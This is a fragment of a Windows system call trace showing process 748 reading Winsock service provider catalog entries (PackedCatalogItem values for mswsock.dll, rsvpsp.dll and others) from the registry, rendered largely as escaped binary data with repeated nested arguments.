\0[\0R\0A\0W\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0:\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0:\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0;\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\04\0;\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0<\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0<\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0=\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0<\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0=\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\14\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\353\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\3\0\0\0\0\0\0\0\377\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0R\0A\0W\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0:\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0:\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0;\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\04\0;\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0<\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0<\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0=\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00570   748   NtClose  (80, ... ) == 0x0
 00571   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000004"}, ... 80, ) }, ... 80, ) == 0x0
 00572   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00573   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00574   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11&\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\354\3\0\0\1\0\0\0\204\370\272\2|\370\272\2\210\371\272\2\4\244`u\\12\0\0\240<_u\260\371\272\2\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0R\0S\0V\0P\0 \0U\0D\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\1\0\0\0\344\373\272\2\1\0\0\0\330\273\356\0\0\0\0\0=\373\220|\200\371\272\2\0\0\0\0\0\371\272\2l\373\220|q\373\220|\0\0\0\0\200\371\272\2=\373\220|\334\370\272\2\0\0\0\0\204\3\0\0?\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0?\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0@\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\05\0@\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0A\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0A\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0B\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11&\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\354\3\0\0\1\0\0\0\204\370\272\2|\370\272\2\210\371\272\2\4\244`u\\12\0\0\240<_u\260\371\272\2\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0R\0S\0V\0P\0 \0U\0D\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\1\0\0\0\344\373\272\2\1\0\0\0\330\273\356\0\0\0\0\0=\373\220|\200\371\272\2\0\0\0\0\0\371\272\2l\373\220|q\373\220|\0\0\0\0\200\371\272\2=\373\220|\334\370\272\2\0\0\0\0\204\3\0\0?\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0?\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0@\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\05\0@\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0A\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0A\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0B\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0A\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0B\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11&\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\354\3\0\0\1\0\0\0\204\370\272\2|\370\272\2\210\371\272\2\4\244`u\\12\0\0\240<_u\260\371\272\2\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0R\0S\0V\0P\0 \0U\0D\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\1\0\0\0\344\373\272\2\1\0\0\0\330\273\356\0\0\0\0\0=\373\220|\200\371\272\2\0\0\0\0\0\371\272\2l\373\220|q\373\220|\0\0\0\0\200\371\272\2=\373\220|\334\370\272\2\0\0\0\0\204\3\0\0?\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0?\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0@\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\05\0@\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0A\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0A\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0B\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00575   748   NtClose  (80, ... ) == 0x0
 00576   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000005"}, ... 80, ) }, ... 80, ) == 0x0
 00577   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00578   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00579   748   NtAllocateVirtualMemory  (-1, 1347584, 0, 4096, 4096, 4, ... 1347584, 4096, ) == 0x0
 00580   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f \2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\355\3\0\0\1\0\0\0\210\1\34\0\0\0\34\0\10\0\0\0\0\0\0\0\214\373\272\2\\15\221|\0\0\34\0\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0R\0S\0V\0P\0 \0T\0C\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\210\1\34\0\0\0\0\0\20\0\0\0P\373\272\2\270Ddu\0\0\0\0(\275\356\0|\373\272\2\364\373\272\2\0\0\34\0\10\0\0\0\0\0\0\0(\374\272\2\\15\221|\0\0\34\0\0\0\0\0\204\3\0\0E\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0E\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0F\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\06\0F\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0G\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0G\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0H\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f \2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\355\3\0\0\1\0\0\0\210\1\34\0\0\0\34\0\10\0\0\0\0\0\0\0\214\373\272\2\\15\221|\0\0\34\0\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0R\0S\0V\0P\0 \0T\0C\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\210\1\34\0\0\0\0\0\20\0\0\0P\373\272\2\270Ddu\0\0\0\0(\275\356\0|\373\272\2\364\373\272\2\0\0\34\0\10\0\0\0\0\0\0\0(\374\272\2\\15\221|\0\0\34\0\0\0\0\0\204\3\0\0E\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0E\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0F\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\06\0F\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0G\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0G\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0H\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0G\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0H\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f \2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\355\3\0\0\1\0\0\0\210\1\34\0\0\0\34\0\10\0\0\0\0\0\0\0\214\373\272\2\\15\221|\0\0\34\0\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0R\0S\0V\0P\0 \0T\0C\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\210\1\34\0\0\0\0\0\20\0\0\0P\373\272\2\270Ddu\0\0\0\0(\275\356\0|\373\272\2\364\373\272\2\0\0\34\0\10\0\0\0\0\0\0\0(\374\272\2\\15\221|\0\0\34\0\0\0\0\0\204\3\0\0E\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0E\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0F\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\06\0F\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0G\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0G\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0H\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00581   748   NtClose  (80, ... ) == 0x0
 00582   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000006"}, ... 80, ) }, ... 80, ) == 0x0
 00583   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00584   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00585   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5&\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0d\200\304\237\230r\344C\267\275\30\37 \211y*\374\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0 \0\0\0\36\0\0\0\36\0\0\0\1\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0R\0f\0C\0o\0m\0m\0 \0[\0B\0l\0u\0e\0t\0o\0o\0t\0h\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0J\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0J\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0K\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\07\0K\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0L\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\